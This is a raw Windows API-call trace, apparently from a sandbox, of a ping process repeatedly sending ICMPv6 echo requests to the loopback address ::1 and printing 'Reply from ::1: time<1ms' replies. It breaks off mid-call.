getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0147.793] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0147.793] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0147.793] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0147.793] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0147.793] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0147.793] LocalFree (hMem=0x4a51b8) returned 0x0 [0147.793] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0147.793] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0147.793] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0147.793] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0147.793] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0147.793] LocalFree (hMem=0x4a29e8) returned 0x0 [0147.793] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0147.794] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0147.794] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0147.794] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: 
_Buf=0x4a8f68*) returned 2 [0147.794] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0147.794] LocalFree (hMem=0x4a8f68) returned 0x0 [0147.794] Sleep (dwMilliseconds=0x3e8) [0148.849] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0148.913] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0148.913] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0148.913] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0148.913] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0148.913] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0148.914] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0148.914] LocalFree (hMem=0x4a51b8) returned 0x0 [0148.914] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0148.914] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0148.914] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0148.914] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0148.914] _setmode (_FileHandle=1, _Mode=16384) returned 
32768 [0148.914] LocalFree (hMem=0x4a29e8) returned 0x0 [0148.914] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0148.914] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0148.914] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0148.914] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0148.915] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0148.915] LocalFree (hMem=0x4a8f68) returned 0x0 [0148.915] Sleep (dwMilliseconds=0x3e8) [0150.023] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0150.074] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0150.074] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0150.074] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0150.074] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0150.074] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0150.074] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0150.074] LocalFree (hMem=0x4a51b8) returned 0x0 [0150.074] FormatMessageA (in: dwFlags=0x900, 
lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0150.074] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0150.074] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0150.074] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0150.075] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0150.075] LocalFree (hMem=0x4a29e8) returned 0x0 [0150.075] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0150.075] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0150.075] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0150.075] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0150.075] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0150.075] LocalFree (hMem=0x4a8f68) returned 0x0 [0150.075] Sleep (dwMilliseconds=0x3e8) [0151.142] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0151.224] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0151.224] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: 
lpBuffer="\xb8\x51\x4a") returned 0x10 [0151.224] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0151.224] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0151.224] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0151.224] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0151.224] LocalFree (hMem=0x4a51b8) returned 0x0 [0151.224] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0151.224] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0151.224] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0151.224] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0151.224] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0151.224] LocalFree (hMem=0x4a29e8) returned 0x0 [0151.224] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0151.225] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0151.225] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0151.225] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0151.225] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0151.225] LocalFree (hMem=0x4a8f68) returned 0x0 [0151.225] Sleep (dwMilliseconds=0x3e8) [0152.332] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 
0x1 [0152.486] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0152.486] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0152.487] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0152.487] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0152.487] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0152.487] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0152.487] LocalFree (hMem=0x4a51b8) returned 0x0 [0152.487] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0152.487] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0152.487] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0152.487] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0152.487] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0152.487] LocalFree (hMem=0x4a29e8) returned 0x0 [0152.487] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0152.487] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0152.487] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0152.487] _write (in: _FileHandle=1, _Buf=0x4a8f68*, 
_MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0152.488] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0152.488] LocalFree (hMem=0x4a8f68) returned 0x0 [0152.488] Sleep (dwMilliseconds=0x3e8) [0153.588] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0153.673] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0153.673] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0153.673] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0153.673] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0153.673] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0153.673] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0153.673] LocalFree (hMem=0x4a51b8) returned 0x0 [0153.673] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0153.673] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0153.673] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0153.673] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0153.673] _setmode (_FileHandle=1, 
_Mode=16384) returned 32768 [0153.673] LocalFree (hMem=0x4a29e8) returned 0x0 [0153.673] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0153.673] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0153.674] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0153.674] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0153.678] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0153.678] LocalFree (hMem=0x4a8f68) returned 0x0 [0153.678] Sleep (dwMilliseconds=0x3e8) [0154.714] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0154.764] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0154.764] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0154.764] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0154.764] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0154.764] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0154.764] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0154.764] LocalFree (hMem=0x4a51b8) returned 0x0 [0154.764] FormatMessageA 
(in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0154.764] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0154.764] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0154.764] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0154.765] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0154.765] LocalFree (hMem=0x4a29e8) returned 0x0 [0154.765] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0154.765] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0154.765] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0154.765] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0154.765] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0154.765] LocalFree (hMem=0x4a8f68) returned 0x0 [0154.765] Sleep (dwMilliseconds=0x3e8) [0155.775] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0155.776] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0155.776] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c 
| out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0155.777] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0155.777] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0155.777] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0155.777] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0155.777] LocalFree (hMem=0x4a51b8) returned 0x0 [0155.777] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0155.777] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0155.777] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0155.777] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0155.777] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0155.777] LocalFree (hMem=0x4a29e8) returned 0x0 [0155.777] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0155.777] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0155.777] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0155.777] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0155.778] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0155.778] LocalFree (hMem=0x4a8f68) returned 0x0 [0155.778] Sleep (dwMilliseconds=0x3e8) [0156.791] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) 
returned 0x1 [0156.901] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0156.901] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0156.901] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0156.901] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0156.901] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0156.901] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0156.901] LocalFree (hMem=0x4a51b8) returned 0x0 [0156.901] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0156.901] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0156.901] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0156.901] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0156.901] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0156.901] LocalFree (hMem=0x4a29e8) returned 0x0 [0156.901] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0156.902] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0156.902] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0156.902] _write (in: _FileHandle=1, _Buf=0x4a8f68*, 
_MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0156.902] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0156.902] LocalFree (hMem=0x4a8f68) returned 0x0 [0156.902] Sleep (dwMilliseconds=0x3e8) [0157.924] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0157.945] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0157.945] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0157.945] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0157.945] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0157.945] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0157.946] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0157.946] LocalFree (hMem=0x4a51b8) returned 0x0 [0157.946] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0157.946] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0157.946] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0157.946] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0157.946] _setmode (_FileHandle=1, 
